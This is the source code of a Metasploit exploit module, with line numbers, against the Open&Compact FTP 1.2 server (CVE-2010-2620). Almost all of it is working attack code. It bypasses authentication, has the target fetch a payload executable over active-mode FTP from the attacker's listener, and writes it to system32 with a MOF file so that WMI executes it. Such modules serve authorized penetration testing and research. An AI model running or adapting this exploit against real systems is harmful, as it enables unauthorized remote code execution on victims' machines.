Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
        include Msf::Exploit::Remote::TcpServer
11
        include Msf::Exploit::EXE
12
        include Msf::Exploit::WbemExec
13
        include Msf::Exploit::FileDropper
14

15
  def initialize(info={})
16
    super(update_info(info,
17
      'Name'           => "Open-FTPD 1.2 Arbitrary File Upload",
18
      'Description'    => %q{
19
        This module exploits multiple vulnerabilities found in Open&Compact FTP
20
        server. The software contains an authentication bypass vulnerability and a
21
        arbitrary file upload vulnerability that allows a remote attacker to write
22
        arbitrary files to the file system as long as there is at least one user
23
        who has permission.
24

25
        Code execution can be achieved by first uploading the payload to the remote
26
        machine as an exe file, and then upload another mof file, which enables
27
        WMI (Management Instrumentation service) to execute the uploaded payload.
28
        Please note that this module currently only works for Windows before Vista.
29
      },
30
      'License'        => MSF_LICENSE,
31
      'Author'         =>
32
        [
33
          'Serge Gorbunov', # Initial discovery
34
          'bcoles', # Metasploit
35
        ],
36
      'References'     =>
37
        [
38
          ['OSVDB', '65687'],
39
          ['EDB',   '13932'],
40
          ['CVE',   '2010-2620']
41
        ],
42
      'Payload'        =>
43
        {
44
          'BadChars' => "\x00",
45
        },
46
      'Platform'       => 'win',
47
      'Stance'         => Msf::Exploit::Stance::Aggressive,
48
      'Targets'        =>
49
        [
50
          # Tested on version 1.2 - Windows XP SP3 (EN)
51
          ['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]
52
        ],
53
      'Privileged'     => true,
54
      'DisclosureDate' => '2012-06-18',
55
      'DefaultTarget'  => 0))
56

57
    register_options([
58
      OptString.new('PATH',  [true, 'The local Windows path', "C:/WINDOWS/"]),
59
      OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
60
    ])
61
    deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass
62

63
  end
64

65
  def check
66
    connect
67
    disconnect
68

69
    if banner =~ /\*\*        Welcome on       \*\*/
70
      return Exploit::CheckCode::Detected
71
    else
72
      return Exploit::CheckCode::Unknown
73
    end
74
  end
75

76
  def on_client_connect(cli)
77
    peer = "#{cli.peerhost}:#{cli.peerport}"
78

79
    case @stage
80
    when :exe
81
      print_status("Sending executable (#{@exe.length.to_s} bytes)")
82
      cli.put(@exe)
83
      @stage = :mof
84
    when :mof
85
      print_status("Sending MOF (#{@mof.length.to_s} bytes)")
86
      cli.put(@mof)
87
    end
88

89
    cli.close
90
  end
91

92
  # Largely stolen from freefloatftp_wbem.rb
93
  def upload(filename)
94
    select(nil, nil, nil, 1)
95

96
    peer = "#{rhost}:#{rport}"
97
    print_status("Trying to upload #{::File.basename(filename)}")
98
    conn = connect(false, datastore['VERBOSE'])
99
    if not conn
100
      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
101
    end
102

103
    # Switch to binary mode
104
    print_status("Set binary mode")
105
    send_cmd(['TYPE', 'I'], true, conn)
106

107
    # Prepare active mode: Get attacker's IP and source port
108
    src_ip   = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
109
    src_port = datastore['SRVPORT'].to_i
110

111
    # Prepare active mode: Convert the IP and port for active mode
112
    src_ip   = src_ip.gsub(/\./, ',')
113
    src_port = "#{src_port/256},#{src_port.remainder(256)}"
114

115
    # Set to active mode
116
    print_status("Set active mode \"#{src_ip},#{src_port}\"")
117
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
118

119
    # Tell the FTP server to download our file
120
    send_cmd(['STOR', filename], false, conn)
121

122
    print_good("Upload successful")
123
    disconnect(conn)
124
  end
125

126
  # Largely stolen from freefloatftp_wbem.rb
127
  def exploit
128
    path     = datastore['PATH']
129
    exe_name = "#{path}/system32/#{rand_text_alpha(rand(10)+5)}.exe"
130
    mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
131
    @mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
132
    @exe      = generate_payload_exe
133
    @stage = :exe
134

135
    begin
136
      t = framework.threads.spawn("reqs", false) {
137
        begin
138
          # Upload our malicious executable
139
          u = upload(exe_name)
140
          # Upload the mof file
141
          upload(mof_name) if u
142
          register_file_for_cleanup("#{::File.basename(exe_name)}")
143
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
144
        rescue ::Exception => e
145
          print_error "Upload Failed: #{e.message}"
146
          cleanup
147
        end
148
      }
149

150
      super
151
    ensure
152
      t.kill
153
    end
154
  end
155
end
156

157